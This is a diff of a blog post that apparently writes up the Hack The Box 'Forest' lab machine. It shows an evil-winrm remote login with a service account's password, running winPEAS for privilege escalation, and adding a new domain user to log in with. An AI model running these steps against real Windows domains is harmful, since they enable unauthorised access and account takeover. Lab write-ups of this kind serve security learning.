jaeflo/jaeflo.github.io/_posts/2020-03-19-hack-the-box-forest.md

 ![userflag](/images/forest/userflag.png)

-Tried with `winPEASany.exe` to escalate privilegies

-`evil-winrm -i forest.htb -u svc-alfresco -p s3rvice -e .` and `Invoke-Binary winPEASany.exe` started the process to scan forest.htb.local
+Tried with `winPEASany.exe` to escalate privilegies.
+The command `evil-winrm -i forest.htb -u svc-alfresco -p s3rvice -e .` and `Invoke-Binary winPEASany.exe` started the process to scan forest.htb.local, but this was a loose end to me.

 net user John fadf24as /ADD /DOMAIN evil-winrm -i 10.10.10.161 -u John -p fadf24as